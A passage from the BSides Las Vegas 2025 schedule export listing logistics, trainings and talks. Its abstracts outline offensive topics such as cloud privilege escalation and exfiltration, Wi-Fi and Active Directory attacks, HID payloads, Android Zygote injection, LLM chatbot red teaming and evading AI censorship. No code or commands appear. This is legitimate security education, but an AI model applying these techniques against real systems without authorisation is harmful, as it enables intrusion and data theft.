Not a formal 12-step meeting. Rather, a supportive gathering for folks taking Summer Camp one day at a time. Monday, Tuesday and Wednesday, 19:30-21:30 in G103. Look for the sign on a patio on the pool side of building G and enter through the patio door. PUBLIC CONFIRMED Event2HR https://pretalx.com/security-bsides-las-vegas-2025/talk/MEABSP/ G-103 PUBLISH EUXUJ3@@pretalx.com -EUXUJ3 Info Booth Opens, Tuesday en en 20250805T070000 000000

Info Booth Opens, Tuesday

Info Booth Opens, Tuesday PUBLIC CONFIRMED Event1HR https://pretalx.com/security-bsides-las-vegas-2025/talk/EUXUJ3/ Hallway PUBLISH KALKCA@@pretalx.com -KALKCA Registration Opens, Tuesday en en 20250805T080000 000000

Registration Opens, Tuesday

Registration Opens, Tuesday PUBLIC CONFIRMED Event1HR https://pretalx.com/security-bsides-las-vegas-2025/talk/KALKCA/ Hallway PUBLISH H9N7UE@@pretalx.com -H9N7UE Skytalks Token Drop 3 en en 20250805T090000 20250805T093000 003000

Skytalks Token Drop 3

Skytalks Token Drop 3 Skytalks token distribution for Tuesday MORNING sessions (10:00-11:30) Queue in Tuscany Hallway between Middle Ground and Speaker Room. Tokens are limited in number, and distribution ends when they are gone. PUBLIC CONFIRMED Event1HR https://pretalx.com/security-bsides-las-vegas-2025/talk/H9N7UE/ Hallway PUBLISH 3E78YM@@pretalx.com -3E78YM Skytalks Token Drop 4 en en 20250805T123000 20250805T133000 010000

Skytalks Token Drop 4

Skytalks Token Drop 4 Skytalks token distribution for Tuesday AFTERNOON sessions (2:00-4:00 PM) Queue in Tuscany Hallway between Middle Ground and Speaker Room. Tokens are limited in number, and distribution ends when they are gone. PUBLIC CONFIRMED Event1HR https://pretalx.com/security-bsides-las-vegas-2025/talk/3E78YM/ Hallway PUBLISH 7A79C9@@pretalx.com -7A79C9 Registration Closes, Tuesday en en 20250805T160000 000000

Registration Closes, Tuesday

Registration Closes, Tuesday PUBLIC CONFIRMED Event1HR https://pretalx.com/security-bsides-las-vegas-2025/talk/7A79C9/ Hallway PUBLISH SVTTCL@@pretalx.com -SVTTCL Info Booth Closes, Tuesday en en 20250805T160000 000000

Info Booth Closes, Tuesday

Info Booth Closes, Tuesday PUBLIC CONFIRMED Event1HR https://pretalx.com/security-bsides-las-vegas-2025/talk/SVTTCL/ Hallway PUBLISH 87YVWJ@@pretalx.com -87YVWJ Multi-Cloud (AWS, Azure & GCP) Security [25 Edition], Day Two, AM en en 20250805T103000 20250805T143000 040000

Multi-Cloud (AWS, Azure & GCP) Security [25 Edition], Day Two, AM

To make the workshop hands-on in the real sense all the trainees will be provided with Lab Access to the Multi-Cloud Environment. Lab Architecture is designed to cover all the attacks from both aspects that are demonstrated during the sessions. ### DAY 1 (8 Hrs) - Part-1 : Introduction about Multi Cloud Environment - Module-1 : Azure Cloud Environment - Azure Identity : Entra ID & RBAC - O365 / Microsoft 365 - Azure Cloud Services (VM, Storage, IaaS, PaaS, SaaS) - Module-2 : AWS Cloud Environment - Identity & Access Management - AWS Cloud Services (IaaS, PaaS, SaaS) - AWS identity Center - Module-3 : GCP Cloud Environment - GCP Identity & Access Management - GCP Cloud Services (IaaS, PaaS, SaaS) - Google Suite / Workspace + Cloud Identity - Part-2 : Enumeration & Initial Access on Cloud Infrastructure - Module-1 : Unauthenticated Enumeration - Enumerating Information from DNS Records - Enumerating Information from Cloud Vendors - Leaked secrets from github - Enumeration storage & other information from OSINT - Module-2 : Initial Access - Exploiting Cloud Services - Leaked Credentials - Compromising CI/CD pipeline - Compromising storage accounts - Module-3 : Authenticated Enumeration : IAM, Compute & Storage - AWS Services - Entra ID & Azure Services - Cloud Identity, Google Workspace, GCP Services ### DAY 2 (8 Hrs) - Part-3 : Exploiting Multi-Cloud Services - Module-1 : Exploiting Multi-Cloud Services - AWS : cross account, within account - Azure : service principal, cross tenant, Entra ID - GCP : Access organization, Cloud Identity - Module-2 : Privilege Escalation - Elevating Privileges on AWS - Elevating Privileges on Azure - Elevating Privileges on GCP - Part-4 : Lateral Movement - Module-1 : Within Multi-Cloud - AWS, GCP, Azure to each other - Part-5 : Case Study (Multi-Cloud Red Team Simulation) - Red Teaming in Simulated Multi-Cloud Lab (Initial Access to Data Exfiltration) ###### NOTE : Attendees do not require cloud accounts, they will get access to the seamless environment & have access to the environment for 15 days with a dedicated discord channel. - Why should people attend your course? - Practically Understand Enterprise Grade Red Team Operation Methodology in Multi-Cloud Environment - Perform Red Team Attack Cycle in Simulated Enterprise Environment - Stealth Lateral Movement Techniques in Multi-Cloud, Cloud to on-premise & vice-versa - Core Services Mapping / Enumeration / Exploitation - Create custom tools to perform manual enumeration - Student Requirements : - Fair Knowledge of Networking and Web Technology - Familiarity with CLI - An Open mind (*No prior Cloud knowledge is required). - Who Should Take This Course ? - Targeted Audience may include the following group of people: - Penetration Testers / Red Teams - Cloud Security Professionals - Cloud Architects - SOC analysts - Threat Hunting Team - Last but not the least, anyone who is interested in strengthening their offensive and detection capabilities in Cloud - How many years of practical experience would the ideal student have to get most out of this workshop? - Minimum 1-3 years in Penetration Testing Domain. - What Students Should Bring? - System with at least 16GB RAM having VMWare Workstation PRO installed - CWL RedCloud VM With Internet Connectivity - What Students Will Be Provided With? - Soft Copy of the Course Content. - Great Knowledge about the Offensive Cloud Techniques used by adversaries. - Defense Tactics & Techniques against the discussed offensive techniques. PUBLIC CONFIRMED Training-16h https://pretalx.com/security-bsides-las-vegas-2025/talk/87YVWJ/ Ballroom Yash Bharadwaj Manish Gupta PUBLISH WBBRNJ@@pretalx.com -WBBRNJ Multi-Cloud (AWS, Azure & GCP) Security [25 Edition], Day Two, PM en en 20250805T150000 20250805T190000 040000

Multi-Cloud (AWS, Azure & GCP) Security [25 Edition], Day Two, PM

To make the workshop hands-on in the real sense all the trainees will be provided with Lab Access to the Multi-Cloud Environment. Lab Architecture is designed to cover all the attacks from both aspects that are demonstrated during the sessions. ### DAY 1 (8 Hrs) - Part-1 : Introduction about Multi Cloud Environment - Module-1 : Azure Cloud Environment - Azure Identity : Entra ID & RBAC - O365 / Microsoft 365 - Azure Cloud Services (VM, Storage, IaaS, PaaS, SaaS) - Module-2 : AWS Cloud Environment - Identity & Access Management - AWS Cloud Services (IaaS, PaaS, SaaS) - AWS identity Center - Module-3 : GCP Cloud Environment - GCP Identity & Access Management - GCP Cloud Services (IaaS, PaaS, SaaS) - Google Suite / Workspace + Cloud Identity - Part-2 : Enumeration & Initial Access on Cloud Infrastructure - Module-1 : Unauthenticated Enumeration - Enumerating Information from DNS Records - Enumerating Information from Cloud Vendors - Leaked secrets from github - Enumeration storage & other information from OSINT - Module-2 : Initial Access - Exploiting Cloud Services - Leaked Credentials - Compromising CI/CD pipeline - Compromising storage accounts - Module-3 : Authenticated Enumeration : IAM, Compute & Storage - AWS Services - Entra ID & Azure Services - Cloud Identity, Google Workspace, GCP Services ### DAY 2 (8 Hrs) - Part-3 : Exploiting Multi-Cloud Services - Module-1 : Exploiting Multi-Cloud Services - AWS : cross account, within account - Azure : service principal, cross tenant, Entra ID - GCP : Access organization, Cloud Identity - Module-2 : Privilege Escalation - Elevating Privileges on AWS - Elevating Privileges on Azure - Elevating Privileges on GCP - Part-4 : Lateral Movement - Module-1 : Within Multi-Cloud - AWS, GCP, Azure to each other - Part-5 : Case Study (Multi-Cloud Red Team Simulation) - Red Teaming in Simulated Multi-Cloud Lab (Initial Access to Data Exfiltration) ###### NOTE : Attendees do not require cloud accounts, they will get access to the seamless environment & have access to the environment for 15 days with a dedicated discord channel. - Why should people attend your course? - Practically Understand Enterprise Grade Red Team Operation Methodology in Multi-Cloud Environment - Perform Red Team Attack Cycle in Simulated Enterprise Environment - Stealth Lateral Movement Techniques in Multi-Cloud, Cloud to on-premise & vice-versa - Core Services Mapping / Enumeration / Exploitation - Create custom tools to perform manual enumeration - Student Requirements : - Fair Knowledge of Networking and Web Technology - Familiarity with CLI - An Open mind (*No prior Cloud knowledge is required). - Who Should Take This Course ? - Targeted Audience may include the following group of people: - Penetration Testers / Red Teams - Cloud Security Professionals - Cloud Architects - SOC analysts - Threat Hunting Team - Last but not the least, anyone who is interested in strengthening their offensive and detection capabilities in Cloud - How many years of practical experience would the ideal student have to get most out of this workshop? - Minimum 1-3 years in Penetration Testing Domain. - What Students Should Bring? - System with at least 16GB RAM having VMWare Workstation PRO installed - CWL RedCloud VM With Internet Connectivity - What Students Will Be Provided With? - Soft Copy of the Course Content. - Great Knowledge about the Offensive Cloud Techniques used by adversaries. - Defense Tactics & Techniques against the discussed offensive techniques. PUBLIC CONFIRMED Training-16h https://pretalx.com/security-bsides-las-vegas-2025/talk/WBBRNJ/ Ballroom Yash Bharadwaj Manish Gupta PUBLISH EAYEJC@@pretalx.com -EAYEJC Engineering Cyber Resilience for the Water Sector en en 20250805T103000 040000

Engineering Cyber Resilience for the Water Sector

This training session emerges from the Idaho National Laboratory Cyber Informed Engineering project, a Department of Energy supported effort to improve system resilience and risk reduction through design efforts to include cyber risks alongside other engineering considered hazards. Previous versions of this course have been conducted using different specific engineering problems to local industry groups. This class is a product from those experiences. The diversity of the BSidesLV attendee base will make this class much more engaging than an industry specific audience. Cyber-Informed Engineering (CIE) offers an opportunity to “engineer out” some cyber risk across the entire system lifecycle, starting from the earliest possible phases of conceptual design and requirements development and system design—the most optimal times to introduce mitigations against cyber risk. CIE is an emerging method to integrate cybersecurity risk considerations into the conception, design, development, and operation of any physical system that has digital connectivity, monitoring, or control. CIE uses design decisions and engineering controls to mitigate or even eliminate avenues for cyber-enabled attacks or reduce the consequences when an attack occurs. In the same way that engineers design systems for safety, engineers informed by CIE use similar methods to prevent or lessen the impact of a cyber-attack. CIE also allows the engineers to advise the approaches used by specialized Information Technology (IT) and Operational Technology (OT) cybersecurity experts to align cybersecurity mitigations to the most critical consequences identified by the engineers. What are the 12 principles of CIE? 1. Consequence-Focused Design 2. Engineered Controls 3. Secure Information Architecture 4. Design Simplification 5. Layered Defenses 6. Active Defense 7. Interdependency Evaluation 8. Digital Asset Awareness 9. Cyber-Secure Supply Chain Controls 10. Planned Resilience 11. Engineering Information Control 12. Organizational Culture The purpose of the training is to help people understand how to use these principles during engineering design to design out many sources of cyber risk. The hands-on workshop engages participants in a journey that helps improve their skills in designing out issues that would later potentially affect cyber risk. The session begins with a presentation of the principles for Cyber Informed Engineering and leads thoughts with an initiating question to prompt thoughts and actions for each principle. The scenario used to facilitate discussion is then presented, providing a template upon which the principles can then be addressed. The exercise then moves through the 12 principles where each is given an overview by one of the facilitators. What follows next is small group exercise tasks designed to facilitate the operationalization of each principle. The facilitators help the groups advance their discussion and learning. The training exercise concludes with a lessons-learned discussion. References: U.S. Department of Energy Office of Cybersecurity, Energy Security, and Emergency Response (CESER). Cyber Informed Engineering Implementation Guide. Version 1.0, August 7, 2023. https://www.osti.gov/biblio/1995796. Technical Report: Cyber-Informed Engineering Workbook: CIE Hands-On Training. Cyber-Informed Engineering Workbook: CIE Hands-On Training. May 29, 2024. https://www.osti.gov/biblio/2371031. PUBLIC CONFIRMED Training-4h https://pretalx.com/security-bsides-las-vegas-2025/talk/EAYEJC/ Pearl Art Conklin Virginia “Ginger” Wright Andrew Ohrt PUBLISH DVKZMR@@pretalx.com -DVKZMR Wi-Fi-So-Serious en en 20250805T150000 20250805T190000 040000

Wi-Fi-So-Serious

Wi-Fi-So-Serious is a beginner-friendly course teaching the basics of 802.11, common Wi-Fi troubleshooting, command-line tools, network reconnaissance, and attacks against common Wi-Fi security protocols. It wraps up with a hands-on CTF to apply the learned skills. Practical Troubleshooting Skills: Participants will learn: Common Wi-Fi Issues: Identifying and understanding typical connectivity problems, such as signal interference, authentication failures, and dropped connections. Troubleshooting Methodologies: Developing a systematic approach to diagnose Wi-Fi issues, including checking physical connections and analyzing network configurations. Basic Troubleshooting Tools: Getting introduced to software or built-in operating system tools that can help analyze Wi-Fi environments and identify problems. Network Reconnaissance: Understanding the surrounding wireless environment is a key step in both network management and security testing. The course will cover methods for: Passive Scanning: Detecting and gathering information about Wi-Fi networks without actively interacting with them. This includes identifying SSIDs, BSSIDs, supported data rates, and security protocols. Active Scanning: Probing networks to gather more detailed information, potentially revealing hidden networks or vulnerabilities. PCAP Analysis: Using Wireshark to extract information from PCAP files. Attacking Common 802.11 Security Protocols and cracking: Open/OWE: Coffee Shop attacks and recon WPS/Wi-Fi Direct: An overview and look at useful tools for attacking WPS and Wi-Fi Direct. WEP: Understanding the historical weaknesses of WEP and how it can be easily cracked using readily available tools. WPA/WPA2: Exploring the vulnerabilities in WPA and WPA2, including handshake capture and password cracking techniques (e.g., dictionary attacks, brute-force attacks). WPA3: An overview of the improvements in WPA3 and its resistance to some of the older attack methods. Participants will learn how to attack WPA3 by leveraging transition mode. EAP: A high level overview, recon, and basics of EAP network attacks Hands-On CTF: The course culminates in a CTF, which is an invaluable way for participants to solidify their learning in a practical and engaging manner. The CTF will involve a series of challenges where participants need to use what they have learned during the class. What to Bring: Students should bring a laptop with at least 8GB of ram. VMware or VirtualBox already installed. Students should have the provided VM loaded as well. Students should also bring a Wi-Fi card that is capable of monitor mode and packet injection. Recommended card: AWUS036ACM PUBLIC CONFIRMED Training-4h https://pretalx.com/security-bsides-las-vegas-2025/talk/DVKZMR/ Pearl James Hawk PUBLISH XMWTBT@@pretalx.com -XMWTBT LLM Mayhem: Hands-On Red Teaming for LLM Applications en en 20250805T103000 20250805T143000 040000

LLM Mayhem: Hands-On Red Teaming for LLM Applications

In this workshop we have set up hypothetical chatbots with varying levels of difficulty to walk attendees through various attack techniques. We'll model the attack after typical red team engagements we have been on in order to test the resiliency of a LLM powered application. The goals of this session are: (1) Provide a foundation on red teaming chatbots, (2) understand how and why the attacks work, and (3) provide guidance on how attendees can set up their own infrastructure to test and hone their skills after the conference has concluded. PUBLIC CONFIRMED Training-4h https://pretalx.com/security-bsides-las-vegas-2025/talk/XMWTBT/ Opal Travis Smith Kasimir Schulz PUBLISH 88YDQ7@@pretalx.com -88YDQ7 Hands on DuckyScript: Introduction to HID Attacks with O.MG Devices en en 20250805T150000 20250805T190000 040000

Hands on DuckyScript: Introduction to HID Attacks with O.MG Devices

This beginner-friendly training will be approximately 4 hours and introduces attendees to the world of physical red teaming using O.MG Devices. This training is meant for those with minimal prior experience covers the fundamentals of HID (Human Interface Device) attacks, ethical hacking, and how attackers exploit physical access to systems using tools that emulate keyboards and mice. Participants will learn how to use the O.MG Plug. Attendees will be encouraged to bring their own devices, however O.MG Plugs will be able to purchased to ensure uniformity of the training. While the class focuses on O.MG devices, the techniques and scripting knowledge are transferable to other DuckyScript-compatible devices like those offered by Hak5. The trainers have a variety of experiences including experience with blue teaming, red teaming (physical attacks), and accessibility. Each trainer will bring these unique personal experiences to the attendees and introduce use cases common tools, deployment strategies, and the truth behind popular portrayals of hacking. It then delves into the technical workings of USB HID protocols and how DuckyScript leverages them to automate keystrokes, launch payloads, and even initiate wireless or geo-fenced commands. Students will get hands-on experience flashing, configuring, and scripting O.MG Devices. The course also covers payload design—emphasizing reliability, stealth, and accessibility—and explores advanced features such as remote control, C2 (Command and Control) integration, and security best practices. No prior scripting experience is required, though basic familiarity with networking and operating systems will be helpful. Students must bring their own laptop. By the end of the course, students will have a strong foundational understanding of HID-based attacks, be able to create and deploy basic payloads, and appreciate the role of human factors in security breaches. Wednesday if possible due to flight itinerary of one of our workshop presenters PUBLIC CONFIRMED Training-4h https://pretalx.com/security-bsides-las-vegas-2025/talk/88YDQ7/ Opal Wasabi Kalani Helekunihi PUBLISH TG9SK9@@pretalx.com -TG9SK9 From Zero Trust to Trusted Advisor: Selling Security to Stakeholders en en 20250805T103000 20250805T143000 040000

From Zero Trust to Trusted Advisor: Selling Security to Stakeholders

Target Audience: Security professionals of all levels (penetration testers, security engineers, analysts, red teamers, etc.) who want to improve their communication and persuasion skills to influence stakeholders and drive security initiatives. Workshop Objectives: Participants will be able to: • Identify and analyze key stakeholders, influencers, and decision makers within their organizations. • Translate technical findings or concepts, such as security by design, into business-centric language. • Tailor your message to your stakeholders and influence them to make better decisions (social engineering for good!). • Articulate the ROI of security investments. • Effectively counter common objections and adversarial tactics. • Develop a practical method for ongoing stakeholder engagement. • Practice communicating complex security issues to non-technical audiences. • Build trust and credibility with diverse stakeholders. • Overcome their own fears and perceived limitations when dealing with key business decision makers. PUBLIC CONFIRMED Training-4h https://pretalx.com/security-bsides-las-vegas-2025/talk/TG9SK9/ Emerald Glen Sorensen Daniela Parker PUBLISH 8AZNL7@@pretalx.com -8AZNL7 Active Directory Attacks and Defense 101 en en 20250805T150000 20250805T190000 040000

Active Directory Attacks and Defense 101

Active Directory remains a critical and often vulnerable component in enterprise environments. Misconfigurations, legacy protocols, and overly permissive defaults frequently expose organizations to high-impact attacks. This 4-hour technical workshop equips attendees with both offensive and defensive AD skills, focusing on real-world threats and mitigation strategies. The session begins with a quick primer on AD architecture—covering domain controllers, LDAP, Kerberos, NTLM, and common user/computer misconfigurations. Students will learn how attackers enumerate domains and locate exploitable targets using built-in Windows tools and open-source utilities. Students will then perform impactful attacks in their own isolated Azure lab environments including: - NTLM Relay using an Ubuntu Docker machine to capture and relay credentials to AD services. - Kerberoasting, where students request service tickets for SPNs and crack them offline. - Machine Account Quota abuse, exploiting the default ability for authenticated users to create computer accounts. - Unconstrained Delegation, showing how attackers impersonate users when delegation is misconfigured. After each attack, students will implement defenses including: - Configure SMB and LDAP signing to prevent relay attacks. - Restrict MachineAccountQuota and delegate computer creation privileges. - Convert Unconstrained Delegation to Constrained/Resource-Based Delegation. - Using Blue Team tools such as Bloodhound CE and PingCastle to investigate a possible breach. Logging and detection are core to any defense. Students will learn how to increase LDAP diagnostic logging levels on the DC, identify key logs associated with each attack, and configure Windows Event Forwarding (WEF) to send critical events to a centralized Ubuntu-based log collector. The lab demonstrates how increasing visibility makes even stealthy attacks detectable. All scenarios will be demonstrated live and reinforced through guided student lab exercises. Lab guides include screenshots and command snippets for easy reference. Students will walk away with a reusable lab environment and deeper insight into AD threats, defense-in-depth strategies, and hardening techniques suitable for real-world environments. This course is ideal for Windows administrators, red teamers, blue teamers, and anyone responsible for defending Microsoft environments. PUBLIC CONFIRMED Training-4h https://pretalx.com/security-bsides-las-vegas-2025/talk/8AZNL7/ Emerald Darryl G. Baker PUBLISH 9GQUFW@@pretalx.com -9GQUFW AI Governance in Action: Fundamentals & Tabletop Workshop en en 20250805T103000 20250805T143000 040000

AI Governance in Action: Fundamentals & Tabletop Workshop

This workshop is designed for security professionals, risk managers, and compliance officers seeking to understand and apply AI governance principles. The session begins with an overview of AI governance fundamentals, including risk assessment, policy development, and regulatory compliance. The latter half involves a tabletop exercise where participants navigate a simulated AI incident, encouraging the application of learned concepts in a controlled environment. The workshop emphasizes interactive learning, providing participants with templates, checklists, and a practical playbook for managing AI risks.​ PUBLIC CONFIRMED Training-4h https://pretalx.com/security-bsides-las-vegas-2025/talk/9GQUFW/ Diamond Josh Harguess Chris Ward PUBLISH KRY9EL@@pretalx.com -KRY9EL Eliminating Bug Classes at Scale: Leveraging Browser Features for Proactive Defense en en 20250805T150000 20250805T190000 040000

Eliminating Bug Classes at Scale: Leveraging Browser Features for Proactive Defense

Fixing the same vulnerabilities over and over doesn’t scale. This workshop takes a different approach - eliminating entire bug classes (where we can) using latest browser security features (some are very new). With the new OWASP Proactive Controls list now including C6 browser security, it’s the perfect time to focus on prevention instead of endless patching. I first ran this workshop inside my own organization, and even experienced AppSec leads found it eye-opening. The idea was inspired by some work happening behind closed doors at big tech companies, e.g. Google. One of the things made public was the Security Signals research paper by Google. I took those ideas, built on them, and created this hands-on training. - Attendees will exploit vulnerabilities in a training app, then apply defenses like CSP v3, Trusted Types, and Sec-Fetch-Metadata to see their impact in real-time. - Teams will compete to break and defend a web application using modern security headers and policies. - We’ll analyze security breaches that could have been prevented with these mechanisms, making the session practical and engaging. - Attendees will learn how to measure and enforce adoption across an organization using their own automation, rather than relying on one-off fixes. - Many security workshops focus on finding and fixing individual bugs. This workshop shifts the perspective toward eliminating entire bug classes using modern browser security features. - Unlike classic hands-on labs, this workshop helps attendees think at scale - how to enforce security measures across entire organizations, making it relevant to large enterprises as well as individual developers. - Covers new web security standards that didn’t exist a few years ago, offering attendees fresh, actionable knowledge beyond OWASP basics. - Unlike many offensive security workshops, this is a security-builder-focused session, empowering developers and security teams to integrate security-by-design. PUBLIC CONFIRMED Training-4h https://pretalx.com/security-bsides-las-vegas-2025/talk/KRY9EL/ Diamond Javan Rasokat PUBLISH PEKNAB@@pretalx.com -PEKNAB Gremlin Hunting with SIGMA rules en en 20250805T103000 20250805T143000 040000

Gremlin Hunting with SIGMA rules

Training will start with a walk through of what a SIGMA rule is, how they work, and how to construct them. I will show various community resources available on how to get started implementing SIGMA in your environment. I will then cover in detail the workflow for our guided hunt framework, "Gremlin Hunters". 1) How the hunts are developed using the SIGMA rule format, using OSINT and internal research. 2) How rules are inputted into our MISP instance, where we use pySIGMA to process and translate the rules. 3) Show how the rules are then sent over to our ticketing system where they are distributed to the hunting team on a weekly basis. 4) How hunt team uses the translations, tailors to environment, then submits findings (and a prod ready rule if applicable). PUBLIC CONFIRMED Training-4h https://pretalx.com/security-bsides-las-vegas-2025/talk/PEKNAB/ Boardroom Rain Baker Nicholas Carroll PUBLISH RB9NV3@@pretalx.com -RB9NV3 Threat and adversary emulation operational exercises en en 20250805T150000 20250805T190000 040000

Threat and adversary emulation operational exercises

This hands-on workshop is designed to equip participants with a solid foundation in practical threat and adversary emulation. Through guided exercises in a controlled, enterprise-grade lab environment, attendees will learn how to safely emulate real-world threat actors. All lab systems will include active defenses such as Anti-Virus, Web Proxies, EDR, SIEM integration and other detection mechanisms. Key topics covered include: • Gathering actionable cyber threat intelligence • Planning and executing adversary emulation engagements • Utilizing attack emulation tools and frameworks • Leveraging MITRE ATT&CK for mapping and execution • Threat hunting techniques • Building custom adversary emulation plans • An introduction to dynamic adversary simulation Each module includes step-by-step walkthroughs of attack vectors, guiding participants through realistic attack paths across enterprise environments. The goal is to help attendees evaluate the effectiveness of security controls and better understand how to test and improve cyber defenses through adversary emulation. PUBLIC CONFIRMED Training-4h https://pretalx.com/security-bsides-las-vegas-2025/talk/RB9NV3/ Boardroom Abhijith "Abx" B R PUBLISH 7MBYEA@@pretalx.com -7MBYEA HR Hates My Mugs: Evading AI Censorship (Token 07) en en 20250805T100000 20250805T102500 002500

HR Hates My Mugs: Evading AI Censorship (Token 07)

n/a PUBLIC CONFIRMED Talk-20m https://pretalx.com/security-bsides-las-vegas-2025/talk/7MBYEA/ Misora TerryBibbles PUBLISH TRNJJY@@pretalx.com -TRNJJY Sex Work Is Tech Work: What Technologists Should Know From the Sex Industry (Token 07) en en 20250805T103000 20250805T111500 004500

Sex Work Is Tech Work: What Technologists Should Know From the Sex Industry (Token 07)

n/a PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/TRNJJY/ Misora Gwyndolyn PUBLISH PBWQHT@@pretalx.com -PBWQHT Mapping the Gaps: How Disconnects in Critical Infrastructure Leave Cities Vulnerable (Token 08) en en 20250805T140000 20250805T142000 002000

Mapping the Gaps: How Disconnects in Critical Infrastructure Leave Cities Vulnerable (Token 08)

n/a PUBLIC CONFIRMED Talk-20m https://pretalx.com/security-bsides-las-vegas-2025/talk/PBWQHT/ Misora QuietRoar PUBLISH 9JKECQ@@pretalx.com -9JKECQ Organizing Cyber: Why We Need More IT & Cybersecurity Unions (Token 08) en en 20250805T142500 20250805T144500 002000

Organizing Cyber: Why We Need More IT & Cybersecurity Unions (Token 08)

n/a PUBLIC CONFIRMED Talk-20m https://pretalx.com/security-bsides-las-vegas-2025/talk/9JKECQ/ Misora CyberGuy PUBLISH 7RPBUM@@pretalx.com -7RPBUM Ask EFF (Token 09) en en 20250805T150000 20250805T154500 004500

Ask EFF (Token 09)

Panelists from the EFF Staff will give brief updates on key topics in their expertise before turning it over to BSides attendees to ask their burning questions about policy, advocacy and making the future of tech brighter. It's a dynamic session fostering engaging discussions on digital rights featuring an EFF staff attorney, activist, and public interest technologist. Moderator Hannah Zhao (she/her) is a Senior Staff Attorney on EFF’s Coders Rights Project. Her work with CRP protects hackers, researchers, and tinkerers on the digital frontier through legal defense, amicus briefs, and education. She also works to push back on emerging surveillance technologies like face recognition, electronic monitoring, and government drones. Hannah has a background in computer science, criminal justice, and international human rights law before her time at EFF. Chris Vines (he/him) is EFF's Grassroots Advocacy Organizer, working with members of the Electronic Frontier Alliance (EFA). With over a decade of experience in organizing and having been a part of over 50 successful electoral & non-profit campaigns, Chris has been instrumental in building progressive bases in several states and is passionate about mobilizing people and getting them the tools needed to bring about progressive change. Lisa Femia (she/her) is a Staff Attorney on EFF's civil liberties team. Her work focuses on surveillance, privacy, free speech, and the impact of technology on civil rights and civil liberties. Lisa came to EFF from Hogan Lovells US LLP, where she maintained a robust pro bono practice centered on democracy reform, criminal justice, and civil rights. Alexis Hancock (she/her) is EFF’s Director of Engineering on our Public Interest Technologist team. She researches an intersection of issues on digital rights, encryption, and consumer technology. She is also well known for managing the Certbot project, advocating for open technology standards and for unveiling insecurities in consumer devices. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/7RPBUM/ Misora Chris Vines Hannah Zhao Lisa Femia Alexis Hancock PUBLISH 93CHRX@@pretalx.com -93CHRX From Drone Strike to File Recovery, outsmarting a nation state (Token 10) en en 20250805T160000 20250805T164500 004500

From Drone Strike to File Recovery, outsmarting a nation state (Token 10)

n/a PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/93CHRX/ Misora Guy Barnhart-Magen Brenton Morris PUBLISH XZ9RXT@@pretalx.com -XZ9RXT Stopping the Nuclear Apocalypse with Threat Intel (Token 11) en en 20250805T170000 20250805T172000 002000

Stopping the Nuclear Apocalypse with Threat Intel (Token 11)

Please see above abstract. This is a short talk talking about what we saw that day, and how we used threat intel on top of our X&Os playbooks to understand that what we were looking at was a way bigger attempt than it appeared. PUBLIC CONFIRMED Talk-20m https://pretalx.com/security-bsides-las-vegas-2025/talk/XZ9RXT/ Misora Paul Miller PUBLISH TAMDET@@pretalx.com -TAMDET Crossing the Border Again with a Burner Phone (Token 11) en en 20250805T172500 20250805T174500 002000

Crossing the Border Again with a Burner Phone (Token 11)

n/a PUBLIC CONFIRMED Talk-20m https://pretalx.com/security-bsides-las-vegas-2025/talk/TAMDET/ Misora Wendy Knox Everette PUBLISH AWCU7W@@pretalx.com -AWCU7W A glitch in the matrix: HUMINT OSINT and Digital Forensics to identify & remove hostile foreign corporate espionage actors (Token 12) en en 20250805T180000 20250805T184500 004500

A glitch in the matrix: HUMINT OSINT and Digital Forensics to identify & remove hostile foreign corporate espionage actors (Token 12)

n/a PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/AWCU7W/ Misora John O. Thorne PUBLISH HM7REA@@pretalx.com -HM7REA Morning Trainings, Tuesday en en 20250805T103000 20250805T143000 040000

Morning Trainings, Tuesday

Morning Trainings, Tuesday PUBLIC CONFIRMED Training-4h https://pretalx.com/security-bsides-las-vegas-2025/talk/HM7REA/ Foyer, Platinum Hotel Conference Center PUBLISH TKFECF@@pretalx.com -TKFECF Trainer Box Lunches Delivered, Tuesday en en 20250805T143000 000000

Trainer Box Lunches Delivered, Tuesday

Trainer Box Lunches Delivered, Tuesday PUBLIC CONFIRMED Event1HR https://pretalx.com/security-bsides-las-vegas-2025/talk/TKFECF/ Foyer, Platinum Hotel Conference Center PUBLISH ULDGKP@@pretalx.com -ULDGKP Afternoon Trainings, Tuesday en en 20250805T150000 040000

Afternoon Trainings, Tuesday

Afternoon Trainings, Tuesday PUBLIC CONFIRMED Training-4h https://pretalx.com/security-bsides-las-vegas-2025/talk/ULDGKP/ Foyer, Platinum Hotel Conference Center PUBLISH ZRR3WQ@@pretalx.com -ZRR3WQ Breaking the Guest List: Hacking Invitation Systems for Fun and Profit en en 20250806T100000 20250806T104500 004500

Breaking the Guest List: Hacking Invitation Systems for Fun and Profit

Invitation systems are an essential part of many social platforms, designed to help users connect and engage. However, these systems can also harbor subtle business logic flaws that, when exploited, allow attackers to manipulate their functionality in unexpected ways. This talk uncovers how vulnerabilities in social media invitation mechanisms can lead to severe security risks. Through detailed examples from Facebook and Snapchat, I'll share how I: - Discovered a way to create permanent invites in Facebook Groups, granting indefinite access to outsiders. - Exploited flaws in Facebook's friend management system to stay friends with anyone indefinitely, bypassing their attempts to remove me. - Broke Snapchat’s invitation system to block legitimate users from accessing their own accounts. This session will explore the technical and logical breakdowns behind these exploits, showing how these vulnerabilities could be leveraged by attackers for persistent access, privacy violations, and account disruption. Attendees will learn how to identify, prevent, and fix business logic vulnerabilities in their own systems, strengthening the overall security of user interaction workflows. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/ZRR3WQ/ Florentine A Ali Kabeel PUBLISH YGNSNC@@pretalx.com -YGNSNC The Age of Zygote Injection en en 20250806T110000 20250806T114500 004500

The Age of Zygote Injection

This project, called Yaga, was developed with the goal of learning how Zygote injection attacks and frameworks like Riru and Zygisk works, and how they can be applied in an offensive context. Over the past two years, I’ve become fascinated by understanding how the Android system works and how its behavior differs from other operating systems. The Zygote process is the first one launched on Android, acting as a template or interface for spawning other processes. Due to its elevated privileges, it can interact with any application, unlike the highly restricted communication between apps enforced by Android’s SELinux policies. This makes Zygote an interesting target for bypassing Android’s sandboxing mechanisms. Today, many people use root binaries like Magisk to customize their devices without understanding what the modules do. Some modules might even use Zygisk to steal sensitive user information or hook critical application functions to subvert them! In this talk, I will explain and demonstrate how these injections are carried out during the loader process, Zygote hooking, and hooking of both native and Dalvik (DEX) application code. In a few years or months, I hope to use this project as a 